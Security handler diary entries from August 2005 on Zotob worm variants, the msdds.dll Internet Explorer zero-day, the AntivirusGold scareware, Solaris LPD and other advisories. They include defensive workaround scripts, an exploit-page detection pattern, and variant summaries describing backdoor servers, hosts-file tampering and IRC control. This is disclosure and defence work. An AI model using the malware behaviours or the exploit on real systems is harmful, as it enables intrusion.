With Zotob and an IE "Zero-Day" hitting pretty much simultaneously, we've really been hoppin'. Last week, during one 24 hour period, we had over 500 emails. Combine that with trying to reverse engineer the Zotob variant of the hour, come up with an easy-to-do MSDDS.DLL fix, or deciding what to do with the Infocon, and it makes life "interesting."

Speaking of that...

Satisfaction Guaranteed, Or Double Your Money Back

For the most part, when people write in, they're kind and polite. They realize that we're just a bunch of geeks/nerds who are trying to help people out and doing it for... well... for nothing. There are about 35 ISC Handlers, and while I don't think any of us would ever claim to have the whole network security "thing" down individually, together we're pretty darned smart. When you write in and ask a question, we do our best to answer it intelligently, honestly, and without bias. We also answer it for free.

That's why it's especially disheartening to have some mental midget tee off on us about:

1) Our choice of when to raise / lower the Infocon.

2) Spelling / grammar / sentence structure.

3) When something on the site isn't working exactly how they think it should.

4) Personal attacks.

5) The grumble du jour.

When I was but a wee lad (I really was young once, and did not, despite popular legend, spring fully formed from the head of Zeus) my Grandmother always told me, "If you can't say something nice, just keep your mouth shut, you stupid little jackass."

Note: The irony of that was lost on me (amid deep psychological scars) until recently.

Therefore, to the bitter, ungrateful (and fearful - did you really need to use an anonymous remailer?) folks out there, and in the spirit of my grandmother's advice, I've decided that I will personally fund the following offer: If you find that you're displeased in any way with the service provided by the Internet Storm Center, we will cheerfully refund double the amount of money that you pay us... you stupid little jackass.

You may now return to your drab, wretched lives.

Follow the Bouncing Malware VIII: All That Glitters Is Not Gold

The story thus far...

From the beginning, Man has always felt a need to document the world around him. Even the earliest proto-humans were driven to scratch marks on cave walls, and in fact, the walls of a cave in Lascaux France were decorated by their inhabitants some 20,000 years ago. Modern anthropologists have described these as primitive paintings of bulls and horses. However, ask any red-blooded modern male what he figures a cave man would be painting on the living room wall, and he'll tell you what those pictures are really all about: Broads.

Naked broads.

Really ugly, hairy, naked broads.

At the dawn of the 21st century, not much had changed. The cave-wall has been replaced with HTML, the primitive pigments with digital cameras, and... well... the broads have shed some hair in addition to their clothes.

One thing really has changed, however. Instead of simply being satisfied with a still-life, we now have the option to show pictures that move. Thus one can now find displayed on various Internet "cave walls" a plethora of on-line documentaries showing how poverty stricken (and thus, clothing-deprived) young adults huddle together and use various friction generating techniques to keep warm.

Ethel, you put your clothes on!

Even in those very early times, porn and other illicit activities probably went hand in hand. You can almost picture Ogg, the caveman, clubbing his pal Grogg, and stealing his pile of shiny rocks after inviting him over to see his etchings of Annugg Kournikovugg.

As I said, not much has changed.

Our pal Joe Sixpack recently went searching for several of the aforementioned documentaries on the Internet. That search required that he install a "codec" to increase his viewing pleasure, and the non-obvious outcome of that viewing has been documented in
and . (If you haven't read these... well, why haven't you? What, do you live under a rock? Sheesh! Go read them now. I'll wait.)

A real gentleman

While we all might be shocked and awed by the fact that Joe's computer was gettin' what the folks in Joe's movies were gettin', it might not have been all bad. It appears that someone might have, as the saying goes, bought Joe's computer some dinner first...

You see, while Joe's machine was being man-handled by others, the fine, gentlemanly folks at Antivirus-Gold.com were, figuratively speaking, knocking on the front door, bearing a bouquet of roses and a box of candy. They're the sensitive types. They want to be Joe's friend. They know, all too well, the trials and tribulations of the modern Internet age and, by golly, they're here to help.

How you doin? I'm holdin' my own.

And so, while Joe is be-boppin' across the Internet, watching people bein' bopped, something new and different happens. While he's seen many a thing pop up on his screen over the past few minutes, a bright orange window is somewhat unexpected. (Note: The enlightened among you need to read no further. Simply from the fact that the makers of AntivirusGold chose "orange" as the color for their window, it can be inferred that they are, indeed, in league with the minions of Chaos. As the Universal Arbiter of Good Taste and quite the snappy dresser (if I do say so myself) I have, long ago, publicly declared my least favorite color, orange, as representative of Nameless Evil.)

In any case, the appearance of a window bearing the hues of the-color-that-shall-not-be-named catches Joe, who is otherwise occupied, a bit off guard:

"Welcome to the AntivirusGold 2.0 Setup Wizard"

Were Joe more of an active participant in this little mise-en-scène, the leap to thoughts of viruses might be a less jarring juxtaposition. As things stand, however, virus "protection" isn't foremost in Joe's thoughts, and with his free hand, he clicks through the Evil-colored windows trying to return to his previously scheduled programming.

Joe agrees to the program's license, lets the installer choose the directory where the files will go, and then happily clicks on "Install," hoping to be done with this whole sordid mess and return to the business... uh... at hand.

But, when another, even more evil-colored window pops up, declaring that his now freshly scanned computer is infected with spyware, Joe decides that perhaps it's time he found a new hobby. Luckily for him, this wonderful, new-found antivirus program that seemed to have been magically installed on his machine had not only warned him about the spyware, but it was now offering to remove it for him...

Oh, joy!

Goin' for Gold

AntivirusGold showed up on Joe's machine as avg.exe, 2,663,231 bytes of NullSoft installer goodness. (Note: AntivirusGold should not be confused with AVG Antivirus by Grisoft. Through an unfortunate coincidence of naming, they sound a whole lot alike. They aren't. The folks at Grisoft are good people, and I don't want any confusion about names to lead anyone to think otherwise.)

When an installer weighs in anywhere over 2MB, you gotta figure that what's going to come out the other side may not be too pretty. AntivirusGold certainly doesn't disappoint. The programmer in me could spend quite a few paragraphs enumerating the slipshod results of unintelligent software engineering, but let's just leave it at this: I have about as much respect for their programming talent as I have for their taste in color.

"So it's another poorly written piece of software," I hear you cry. "If that was a crime, Redmond would be a penitentiary."

"True," I reply, "and if these folks stopped there, then I would only make fun of them behind their backs, like I do to Microsoft."

The problem is, they don't stop there.

You see, AntivirusGold is a nasty little lying piece of software.

What did you say, Tom?

"A nasty little lying piece of software."

Got it now?

AntivirusGold does indeed act something like antivirus software. It scans through registry entries and cookies looking for the likes of Gator, Bonzi Buddy, et al. It looks through the filesystem and tries to find programs that match up (by filename only, not any type of signature) with a list of "known bad" files.

If it stopped there, then it would simply be a poorly written, ineffective spyware/virus scanner.

But there's more.

When it gets all done doing its scan, it tells you what it found and offers to remove it for you. Just like every other spyware/virus scanner...

But this one does it for a price.

Yes, you see, AntivirusGold pops up a window telling you "You are infected!", and offers to remove the "spyware" that it found. But when you click on the "Remove spyware" button, rather than removing something, it only offers you the option to register the program to the tune of $29.95.

The implication is obvious: "I found something bad on your machine, and it'll cost you three sawbucks to get it gone."

And what, pray tell, did AntivirusGold find that required removal and made it worth my hard-earned $29.95?


Absolutely nothing.

Using monitoring software, I watched as AntivirusGold scanned my machine.

I watched it looking for registry entries.

I watched it looking for cookies.

I watched it looking for files.

It didn't find a thing. Every query that it made for a cookie, a registry entry, or a file came back empty.

Now it's not exactly surprising that it didn't find anything. You see, AntivirusGold was running on a fresh, clean, brand-spankin' new install of Windows XP Home Edition that had never been used and never connected to the Internet.


The only non-default software on the machine was AntivirusGold itself.

And yet, I was "infected" with "spyware."

The astute reader may draw their own conclusions.


Handler on Duty - Tom Liston, Intelguardians

Published: 2005-08-21

Slow Sunday; CA Message Queuing Vulns; Process Explorer Vuln; Infocon: Green Redux

Ahh the glory..

of a Sunday shift. Peace and quiet. Quite a difference given the extraordinary amount of traffic on the handlers list in the past week. Phew. Lucky me.

CA Message Queuing Vulnerabilities

Fixes for a number of CA Message Queuing products have been made available. These vulnerabilities include a possible DoS, a buffer overflow, and a possible spoofing vulnerability that would allow arbitrary commands to be executed. More information is available at:


Sysinternals Process Explorer Vulnerability

A vulnerability in the venerable Process Explorer from Sysinternals has been disclosed. It has been found to be prone to a buffer overflow that could result in the execution of arbitrary code. More information is available at


From the Last Diary Entry: Infocon back to Green.

Our Infocon is back to Green after staying at Yellow for 24 hours to alert readers to the new MS IE msdds.dll issue. Microsoft released its advisory yesterday with some more information; you can find more in yesterday's diary. Even though we are back to Green, the issue still exists; we will keep updating with any new information, so stay with us.


Published: 2005-08-19

INFOCON back to GREEN; Cisco "device" Zotob & Rbot problems, Spanish Zotob description, Sun LPD remote exploit; More about Msdds.dll issue

Infocon back to Green.

Our Infocon is back to Green after staying at Yellow for 24 hours to alert readers to the new MS IE msdds.dll issue. Microsoft released its advisory yesterday with some more information; you can find more in yesterday's diary. Even though we are back to Green, the issue still exists; we will keep updating with any new information, so stay with us.

Cisco "device" Zotob & Rbot problems

The UK's NISCC published that says that "Symptoms on Cisco devices include, but are not limited to, high CPU and traffic drops on the input interfaces."

**snipped from NISCC**

"Affected Products

If the software versions or configuration information are provided, then only those combinations are vulnerable. This is a list of appliance software that needs patches downloaded from Cisco:
* Cisco CallManager
* Cisco Customer Response Application Server (CRA)
* Cisco Personal Assistant
* Cisco Conference Connection (CCC)
* Cisco Emergency Responder

Other Cisco products that run on a Microsoft-based operating system should strongly consider loading the security update from Microsoft at

This list is not all inclusive, so refer to Microsoft's Advisory if you think you have an affected Microsoft platform.

* Cisco Unity
* Cisco Building Broadband Service Manager (BBSM)
* Cisco CNS Network Registrar (CNR)
* Cisco Customer Voice Portal
* Cisco ICM Enterprise Edition
* Cisco ICM Hosted Edition
* Cisco IP Contact Center (IPCC) (Express, Enterprise, Hosted, Remote Agent)
* Cisco E-mail Manager (CEM)
* Cisco Web Collaboration Option
* Cisco Collaboration Server Dynamic Content Adapter
* Cisco Media Blender (CMB)
* Cisco IP Interactive Voice Response
* IP Queue Manager
* Cisco Customer Voice Portal
* Cisco Computer Telephony Integration Option
* Cisco Outbound Option
* Cisco Remote Monitoring Suite Option
* Cisco Support Tools
* TrailHead (Part of the Web Gateway solution)
* Cisco Networking Services for Active Directory (CNS/AD)
* Cisco SN 5400 Series Storage Routers (driver to interface to Windows server)
* CiscoWorks
-- + CiscoWorks VPN/Security Management Solution (CWVMS)
-- + User Registration Tool
-- + LAN Management Solution
-- + Routed WAN Management
-- + Service Management
-- + IP Telephony Environment Monitor
-- + Small Network Management Solution
-- + QoS Policy Manager
-- + Voice Manager
* Cisco Transport Manager (CTM)
* Cisco Broadband Troubleshooter (CBT)
* DOCSIS CPE Configurator
* Access Control Server (ACS)
* Videoconferencing Applications
-- + IP/VC 3540 Video Rate Matching Module
-- + IP/VC 3540 Application Server"

The advisory also includes ACLs for IOS.

Spanish version Zotob description.

One of our readers, Javier, translated our recent description of the Zotob variants into Spanish. Even though I don't understand Spanish, it will be useful for people whose native language is Spanish. You can find it here


Sun LPD remote exploit

Sun Microsystems released a patch on the 8th of August. Today, Metasploit released a new exploit module for the Solaris LPD remote vulnerability. If you are not using the LPD service, disable it: edit the /etc/inetd.conf file and comment out the following line.

#printer stream tcp6 nowait root /usr/lib/print/in.lpd in.lpd

Of course, don't forget to send a hangup signal to the inetd process so that it re-reads its configuration: /usr/bin/pkill -HUP inetd

You can find more detailed information at the following site: http://sunsolve.sun.com/search/document.do?assetkey=1-26-101842-1. If you are not using the LPD service, disable it; otherwise, don't forget to patch it. The miscreants will use this exploit to compromise your systems.
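As an added example (ours, not from the diary), the disable-LPD procedure above as a script: it comments out the printer entry in inetd.conf and then sends inetd the HUP the diary describes. It assumes a classic inetd driven by /etc/inetd.conf (not SMF), runs as a dry run by default, and is exercised against a constructed inetd.conf fragment.

```python
import re
import shutil
import subprocess
import time

# Service name of the LPD listener in inetd.conf, as in the line quoted in the diary:
#   printer stream tcp6 nowait root /usr/lib/print/in.lpd in.lpd
LPD_SERVICE = "printer"

# Constructed inetd.conf fragment for the demonstration (sample data, not a real host).
SAMPLE_INETD_CONF = """\
# inetd.conf (constructed sample)
ftp      stream  tcp6    nowait  root    /usr/sbin/in.ftpd       in.ftpd
printer  stream  tcp6    nowait  root    /usr/lib/print/in.lpd   in.lpd
#printer stream  tcp     nowait  root    /usr/lib/print/in.lpd   in.lpd
telnet   stream  tcp6    nowait  root    /usr/sbin/in.telnetd    in.telnetd
"""


def active_entries(conf_text, service):
    """1-based line numbers of uncommented inetd entries for `service`."""
    pattern = re.compile(r"^\s*" + re.escape(service) + r"\s")
    return [n for n, line in enumerate(conf_text.splitlines(), 1) if pattern.match(line)]


def disable_service(conf_text, service):
    """Comment out every active entry for `service`; other lines are left untouched.
    Idempotent: entries that are already commented out are not touched again."""
    pattern = re.compile(r"^([ \t]*)(" + re.escape(service) + r"[ \t].*)$", re.MULTILINE)
    return pattern.sub(r"\1#\2", conf_text)


def disable_lpd_on_host(conf_path="/etc/inetd.conf", dry_run=True):
    """Back up inetd.conf, comment out the LPD entry, then HUP inetd so it re-reads
    the file (the diary's /usr/bin/pkill -HUP inetd). With dry_run=True nothing is
    written or signalled; the function only reports what it would do."""
    with open(conf_path) as fh:
        before = fh.read()
    lines = active_entries(before, LPD_SERVICE)
    if not lines:
        return "LPD already disabled in %s" % conf_path
    if dry_run:
        return "would comment out line(s) %s in %s and HUP inetd" % (lines, conf_path)
    shutil.copy2(conf_path, conf_path + time.strftime(".bak.%Y%m%d%H%M%S"))
    with open(conf_path, "w") as fh:
        fh.write(disable_service(before, LPD_SERVICE))
    subprocess.check_call(["/usr/bin/pkill", "-HUP", "inetd"])
    return "disabled LPD (line(s) %s) in %s and sent HUP to inetd" % (lines, conf_path)
```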

More about Msdds.dll issue

Microsoft updated their advisory on the Msdds.dll exploit issue. The updated version contains additional information regarding which applications ship the affected DLL and are configured in a vulnerable state.

The following statements summarize the updated information.

The affected versions of Msdds.dll are 7.0.9064.9112 and 7.0.9446.0.
Customers who have Msdds.dll with version 7.0.9955.0, 7.10.3077.0, or
higher on their systems are not affected by this vulnerability.

The Microsoft DDS Library Shape Control (Msdds.dll) does not ship in
the .NET Framework.

Microsoft Office 2003 is not affected by this vulnerability (it ships a higher version of the DLL).

Microsoft Access 2003 is not affected by this vulnerability (it ships a higher version of the DLL).

Microsoft Visual Studio 2003 is not affected by this vulnerability (it ships a higher version of the DLL).

Microsoft Visual Studio 2002 Service Pack 1 is not affected by this vulnerability (it ships a higher version of the DLL).

Microsoft Office XP Service Pack 3 is not affected by this vulnerability by default. However, it is in a vulnerable configuration if the VS runtime library files are in the search path for Internet Explorer. These files are Msvcr70.dll and Msvcp70.dll. For instance, placing them in the same directory as Msdds.dll or in the %windir%/system32 directory could expose Office XP customers to this issue.

You can find the workarounds from our


Kevin Hong - khong-at-kisa.or.kr/Handler On Duty

Published: 2005-08-18

Infocon gone yellow; Patch available for Internet Explorer (.Net) 0day Exploit; Open letter; OS-X Patches; 1433 scans after Zotob; Zotob MSRT updated

Infocon gone Yellow

The Infocon status is now yellow, due to the MSDDS.DLL exploit now available. We moved to Yellow as we feel widespread malicious use of this vulnerability is imminent, and the workarounds shown here provide sufficient countermeasures to be applied quickly. We expect to move back to green by the end of the day or early tomorrow.

Internet Explorer (.Net) 0day msdds.dll Exploit & Patch

Yesterday, FrSIRT (aka K-otik) released a working 0-day exploit against
a .Net component which is accessible remotely via Microsoft Internet Explorer.

Update 1600 EST:


Microsoft has released a security advisory with regards to MSDDS.DLL.

The exploit will open a remote shell if you visit a malicious website.
Other payloads are possible. The exploit will have all the privileges
assigned to the user running Internet Explorer. We do not see any use of
the exploit at this time, but consider widespread use imminent.

Am I Vulnerable?

You are only vulnerable if you have "msdds.dll" installed on your system.
By default, Windows will not install this DLL. See below for details.
The DLL can be found in Program Files\Common Files\Microsoft Shared\MSDesigners7. Note that the directory may be named
differently in non-English versions of Windows.

The vulnerable version is 7.0.9064.9112. Later versions are not
vulnerable (in particular 7.10.x).


While there are no official patches available, there are a number of

* Set the "kill bit" for the ActiveX component. We released a number of scripts
to set the "kill bit" for the affected ActiveX component. This will prevent
use of the vulnerable ActiveX component by Internet Explorer. msdds.dll may
still be used by local applications (and this is ok). But this may break
ActiveX applications accessed via the browser, if they make use of this
vulnerable function.
* You can make the same change using the registry editor. Change this key:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{EC444CB6-3E7E-4865-B1C3- 0DE72EF39B3F}\Compatibility Flags=0x00000400 [Jerry] I added a space in the key to avoid the above mentioned content filter rule [John].

* Remove the vulnerable DLL from your system. This may break various applications that installed the DLL.

* Use 'DropMyRights' to limit the impact of an exploit.

* Use an alternative browser (Firefox, Opera) which does not provide ActiveX.

Note that other browsers may in fact use the MSIE engine to render code, for example ActiveX such as this one. Netscape 8 for example has this capability, and may be vulnerable. This has not yet been confirmed. [AB]

* If you are able to apply content filters to your internet gateway (e.g. a proxy server), filter for this string:

(in order to allow you to still visit this page, we substituted the '-' with the word '(dash)' ...)
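Added example (not from the diary or from Microsoft): a small triage helper that applies the version facts from this and the following day's entry together with the kill-bit workaround listed above. It assumes a regedit export of the ActiveX Compatibility key as input, and it treats every build at or above 7.0.9955.0 as unaffected, which is our reading of the diary's "or higher".

```python
import re

# CLSID of the vulnerable MSDDS ActiveX control as given in the diary (the diary
# inserts a space in the GUID to dodge its own content filter; the real key has none).
MSDDS_CLSID = "{EC444CB6-3E7E-4865-B1C3-0DE72EF39B3F}"
KILL_BIT = 0x00000400  # the kill bit in "Compatibility Flags"

# File versions the diary reports as vulnerable, and the first one it reports as fixed.
VULNERABLE_VERSIONS = {(7, 0, 9064, 9112), (7, 0, 9446, 0)}
FIRST_FIXED_VERSION = (7, 0, 9955, 0)

# Constructed regedit export showing the kill bit already set (sample data, not a capture).
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{EC444CB6-3E7E-4865-B1C3-0DE72EF39B3F}]
"Compatibility Flags"=dword:00000400
'''


def parse_version(text):
    """Turn 'a.b.c.d' into a tuple of ints so comparisons are numeric, not lexical."""
    parts = text.strip().split(".")
    if len(parts) != 4 or not all(p.isdigit() for p in parts):
        raise ValueError("bad file version: %r" % text)
    return tuple(int(p) for p in parts)


def msdds_status(version_text):
    """Classify an Msdds.dll file version using the versions the diary lists."""
    version = parse_version(version_text)
    if version in VULNERABLE_VERSIONS:
        return "vulnerable"
    if version >= FIRST_FIXED_VERSION:   # covers 7.0.9955.0 and every 7.10.x build
        return "not affected"
    return "unknown"                      # a build the diary does not mention


def killbit_set(reg_text, clsid=MSDDS_CLSID):
    """Report whether a regedit export sets the kill bit for clsid.

    Only the "ActiveX Compatibility\\{CLSID}" section is inspected, and the 0x400
    bit is tested rather than the whole value, because Compatibility Flags may
    combine several flags."""
    wanted = ("\\activex compatibility\\" + clsid).lower()
    in_section = False
    for line in reg_text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            in_section = line[1:-1].lower().endswith(wanted)
            continue
        if in_section:
            match = re.match(r'"Compatibility Flags"=dword:([0-9A-Fa-f]{8})$', line)
            if match:
                return bool(int(match.group(1), 16) & KILL_BIT)
    return False


def assess(version_text, reg_text):
    """One-line verdict combining the DLL version with the registry state."""
    status = msdds_status(version_text)
    if status == "vulnerable" and killbit_set(reg_text):
        return "vulnerable version, but kill bit set: not reachable from Internet Explorer"
    return status


def killbit_reg(clsid=MSDDS_CLSID):
    """Emit a .reg file applying the registry workaround listed above (kill bit only)."""
    key = ("HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Internet Explorer"
           "\\ActiveX Compatibility\\" + clsid)
    return "\r\n".join([
        "Windows Registry Editor Version 5.00",
        "",
        "[" + key + "]",
        '"Compatibility Flags"=dword:%08x' % KILL_BIT,
        "",
    ])
```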


How do I recognize a web page which contains exploit code?

Look for this pattern:

<object classid="EC444CB6(dash)3E7E(dash)4865(dash)B1C3(dash)0DE72EF39B3F"></object>

If you visit a page with the exploit, it will load very slowly. In some
cases, we got a warning that the system is low on virtual memory.

Current virus scanners may recognize the exploit using rules developed for
older, similar exploits.

What software may install the DLL?

Here is a list of applications that may install this component:

(Disclaimer: We can't test them all... but it should help you prioritize)

MS Visual Studio .Net

.Net Framework 1.1

Microsoft Office (2000, 2002, XP) [Karl, Juha-Matti]

Microsoft Project

Visio [Chris]

Access 11 (2003) runtime [Scott]

ATI Catalyst driver installed by newer ATI video cards [Eric]
MSDDS.DLL is not found on Win2003 SP1 SERVER with .net installed (not Visual Studio .net). [Andy].

Not all default Office 2000 installs have msdds.dll installed. [Emmanuel]

We get conflicting reports, likely due to various configuration and install choices. Please verify yourself the version before concluding that you are not vulnerable.

The version of MSDDS.DLL installed with Office 2003 is not vulnerable.

If you test your system using the PoC exploit, please let us know if it succeeded, and what version of MSDDS.DLL you are using. Version 7.10.3077.0 may not be vulnerable (according to Secunia and our testing). [Juha-Matti]

Version 7.0.9064.9112 is vulnerable [Gilles].

MSDDS Trivia:

- MSDDS stands for "Microsoft Design Tools - Diagram Surface".

- You sometimes may find the (wrong) spelling "msdss" in earlier versions of our diaries.

Related Links:


Open letter from the handlers

It merits pointing out that this particular vulnerability really isn't
0-day, it's more like 380-day, as the underlying vulnerability has
been around for a LONG TIME.

See http://www.informationweek.com/story/showArticle.jhtml?articleID=22102487&tid=5979
for example.

Microsoft (and others; sorry Tom) have been recommending that users set
"kill bits" on individual ActiveX/COM objects for a year now, as an
ultimate fix for the issue. In MS05-038's writeup:

"Because not all COM objects are designed to be accessed through
Internet Explorer, this update sets the kill bit for a list of Class
identifiers (CLSIDs) in COM objects that have been found to exhibit similar
behavior to the JVIEW Profiler vulnerability that is addressed in Microsoft
Security Bulletin MS05-037. To help protect customers, this update prevents
these CLSIDs from being instantiated in Internet Explorer. For more
information about kill bits, see Microsoft Knowledge Base Article 240797."

Have we all forgotten the lessons of taking a default-permit stance with
regard to defense? The underlying vulnerability is not that javaprxy.dll
(MS05-037) or shell32.dll (MS05-038) or msdds.dll can be invoked from a
web page; the real issue is that the MSIE Renderer, which can be invoked
from nearly every Microsoft application (Office, Outlook, ...) is allowed
to access any object within the operating system without any controls.

There should be a default-deny setting, allowing only a white-list of
"known good" ActiveX objects. Microsoft, this situation demands a more
effective and encompassing solution, it needs to be enabled by default,
and it cannot afford to wait for Vista & IE7 to be released.

Update 2005-08-18 23:35 UTC: Reader M. writes in to remind us that
there are a couple of ways that technically-savvy users can harden MSIE
against this sort of attack:

"They already have two available: the Administrator Approved list at
Internet Settings\AllowedControls
which is enabled by setting "Run ActiveX Controls and Plug-ins" (value 1200)
in the Internet security zone to "Administrator Approved"
This has been available since IE 5 and works in IE 6 on both XP Pro and
XP Home. The details are documented in KB article 182569.

There is also a way to implement a whitelist using the new add-on management
functionality that was added in IE 6 on XP SP2. Just set the "Deny all
Add-ons unless specifically allowed in the add-on list." The details are
in the technet documentation that describes the new security features in IE
on XP SP2." Thanks! [ Now, if only we could get that enabled by the
next round of kill-bit patches. ;-) ]

Apple OS-X 2005-007 patches

Apple released patch set #7 for this year:

A number of critical issues are fixed by this patch set. Highlights include
Apache2, Bluetooth and zlib. It is recommended that OS-X users apply these patches expeditiously. For some of these issues, exploit code is available for other platforms and may be adapted to OS-X.

Make sure you use version 1.1 of this patch set. Initially, Apple released 1.0, but it was missing a critical 64-bit library and broke some applications. [Harry].

Port 1433 scans after Zotob infection

One reader reported that he observed a significant increase in port 1433 scanning after a host in his network was infected with Zotob. The implication may be that miscreants are monitoring for Zotob-infected machines and scan them assuming weak security practices in the respective network.

Malicious Software Removal Tool updated for Zotob

This Alert is to notify you that on 17 August 2005 the Microsoft Windows
Malicious Software Removal Tool has been updated with added detection
and cleaning capabilities for the following Malicious Software:

* Zotob.A
* Zotob.B
* Zotob.C
* Zotob.D
* Zotob.E
* Bobax.O
* Esbot.A
* Rbot.MA
* Rbot.MB
* Rbot.MC

The updated version of the Microsoft Windows Malicious Software Removal
Tool is available for download from the Download Center at this

NOTE: This updated version is currently NOT available on Windows Update,
Microsoft Update or through Windows Server Update Services.

- Thank you Susan!


We received a lot of great input from readers.
I started acknowledging reader input using square brackets and their first name.
THANKS!!! Keep it coming!!!
Johannes, Adrien, and the ISC handler team


Published: 2005-08-17

Possible MSIE Zero-Day; Analysis of Zotob versions; Why are we still Green;

Possible MSIE Zero-Day

FrSIRT posted a possible zero-day exploit against Microsoft Internet Explorer (MSIE) 6. According to the notes posted with the exploit, it should open a remote shell by exploiting Msdds.dll.

In order to be vulnerable, 'msdds.dll' has to be installed on your system. By
default this is not installed on Windows XP or 2000. However, if you install Visual Studio .Net, msdds.dll will be installed. Some of the .Net SDKs may include the component as well, but we were not able to verify this (please let us know if you see msdds.dll without Visual Studio .Net).

Antivirus scanners are able to detect this exploit as "Iframebof Exploit" (Kaspersky) or "JS.Bofra.A" (Bitdefender). They may trigger on the shell code, which is bound to change if shell code with different functionality is used.

Analysis of Zotob Versions.

As promised earlier, here is my analysis as of 11:30 am CDT. Hopefully I have included enough information to help those who have been infected figure out exactly which version they are infected with.

Good Afternoon Internet Users

Yes, the fun does continue. The little fellows that wreaked havoc on CNN, ABC, the NY Times and other "rumored" victims are still at it. Symantec has identified two more versions of Zotob, so we are now up to version G.

Thought I would try to compile some info and see if we can determine the actual differences between these. It may help some of you to determine just exactly what version of these rascals you are dealing with. So here goes my perhaps feeble attempt at trying to make heads or tails out of this mess.

After having killed a couple of trees printing out the Symantec reports on each of these so that I could review them off line (I don't comprehend very well if I don't hold the document in my hands while I read), here is what I have come up with.

CAUTION: We do observe a large variety of Bots taking advantage of MS05-039. Not all of them are characterized as Zotob, and some may escape AV detection all together. Do not assume that you are "safe" if you don't find Zotob, but if you are vulnerable to the PNP exploit. Some of the other bots match generic SDBot or RBot signatures.


Executable size: 22,528 bytes
Executable name: botzor.exe
Ports: TCP 445, 8080, 33333
Aliases: Zotob.A [F-Secure], W32/Zotob.worm [McAfee], W32/Zotob-A [Sophos], WORM_ZOTOB.A [Trend]
Other details: Opens an FTP server on port 33333, copies 2pac.txt and haha.exe to the system directory, and adds itself to the Run and RunServices entries in the registry. Modifies the hosts file to prevent antivirus and security programs from updating.

Executable size: 27,648 bytes
Executable name: csm.exe
Ports: TCP 445, 8080, 33333
Aliases: Zotob.B [F-Secure], W32/Zotob.worm.b [McAfee], W32/Zotob-B [Sophos], WORM_ZOTOB.B [Trend Micro]
Other details: Opens an FTP server on port 33333, copies 2pac.txt and haha.exe to the system directory, and adds itself to the Run and RunServices entries in the registry. Modifies the hosts file to prevent antivirus and security programs from updating.

Executable size: 41,984 bytes
Executable name: per.exe
Ports: TCP 445, 8080, 33333
Other details: Mass-mailing worm that uses a predefined list of recipient names, appending the domain names it gathers from the infected computer. Contains its own SMTP engine to e-mail the addresses it finds. Opens an FTP server on port 33333 and adds itself to the Run and RunServices entries in the registry. Modifies the hosts file to prevent antivirus and security programs from updating.

Executable size: 51,326 bytes
Executable name: windrg32.exe
Ports: TCP 6667, 1117, 445
Other details: Opens an FTP server on port 11173, attempts to end a variety of processes, modifies the registry and deletes a variety of registry entries, deletes a variety of files from the system and Program Files directories, and adds itself to the Run and RunServices entries in the registry. Modifies the hosts file to prevent antivirus and security programs from updating.

Executable size: 10,366 bytes
Executable name: wintbp.exe
Ports: TCP 8594, 8080, 445; UDP 69
Aliases: WORM_RBOT.CBQ [Trend Micro]
Other details: Opens a TFTP server on UDP port 69, connects to IRC server at on TCP port 8080 to listen for update instructions, and adds itself to the Run entries in the registry.

Executable size: 10,878 bytes
Executable name: wintbpx.exe
Ports: TCP 445
Other details: Opens multiple TCP ports. Connects to IRC server at to listen for update instructions, adds itself to the Run entries in the registry, and creates a file named %Temp%\[NUMBER] which, if successful, contains TFTP scripts to download additional files.

Executable size: 73,728 bytes
Executable name: windrg32.exe
Ports: TCP 445, 6667, 1171
Aliases: W32.Drudebot.A
Other details: Attempts to connect to IRC servers on port 6667, opens a TFTP server on port 1171, attempts to end a variety of processes, modifies the registry and deletes a variety of registry entries, deletes a variety of files from the system and Program Files directories, adds itself to the Run and RunServices entries in the registry, and creates a file named %Temp%\[NUMBER] which, if successful, contains TFTP scripts to download additional files. Modifies the hosts file to prevent antivirus and security programs from updating.

This is the information that I have as of this Diary update. We will keep you posted if anything changes.

Update: Symantec has now updated its removal tool to include removal for all of the current versions of the Zotob virus. You can find it on Symantec's web site at:

Why our Infocon is green

(Jim Clausing for Deb who is in a meeting) We've gotten some e-mail asking why, with all the apparent outbreaks of worms, our Infocon remains at green. The answer is pretty simple. We first suggested in the diary that these exploits would probably turn into worms (and warned users/administrators to patch now) on Friday. We raised Infocon to yellow Saturday morning (UTC) because we thought it likely that the worms would show up over the weekend. We were right. They first showed up Sunday morning. Frankly, the Infocon was raised when there was still a chance to do something about the situation. We lowered it back to green Tuesday morning (UTC) when the scanning effectively became part of the normal background noise on the internet. Our stance has always been we raise Infocon to get the attention of the community and we leave it there the shortest time possible. Unfortunately, there have been some high profile cases of organizations that didn't or couldn't patch in a timely fashion so it suddenly became a big story in the mainstream media yesterday. While this is regrettable, as one of the other handlers stated in e-mail, "Close the barn door, that horse ran out last week."

Deb Hale

Handler on Duty


Published: 2005-08-16

Another PnP Worm; Feedback from Microsoft; Reader Mailbag; Johannes Redux; Apple Security Patches

Another PnP worm on the loose...

CNN reported a worm outbreak this afternoon involving their network, ABCNews, NYTimes, as well as Capitol Hill.

Information is still flowing on this situation, but here's what we have so far:

Symantec just released info on the W32.Zotob.E worm

Trend Micro also released information under WORM_RBOT.CBQ.

McAfee released information as well:

This is an IRC bot worm, and will scan for TCP port 445, and for file shares. McAfee reports in its bulletin that systems not patched for MS05-039 will continually reboot.

It exploits known vulnerabilities, and the patch is available from microsoft here:

More updates coming as we analyze and gather more information!

A few words from the Microsoft Security Response Center

Mike from the MSRC sent an e-mail with "clarification regarding changing the default setting of NULL sessions and what the impact of changing these settings does to the threat profile of the PnP vulnerability addressed in MS05-039"

The information has been published in the
updated yesterday.

Take note of the section on mitigating factors.

Mike also mentioned that the McD's Bomber Message Malware mentioned in
is exploiting the vulnerability that is patched with

Reader Mailbag

Kerry Tyler, a self described "Windows Server Wrench" offered the following:

I just wanted to drop a note of thanks for this weekend's coverage of the MS05-039 fun. I came back to the office from lunch on Friday to a blinky green globe in my System Tray--perfect timing to remind me that we still have a couple of straggling Windows 2000 Servers around that needed patched RIGHT THEN, no waiting until our usual Sunday morning patching with the 2K3 boxes. Disaster mostly averted, only held up by crappy Change Management procedures. (had one machine get hit, but mostly a failed exploit attempt, as they did cause the machine to restart)

Many thanks on a job well done, and glad to see some yellow--keeps us on our toes! ;-)

I think Josh summed it up best in his reply ..

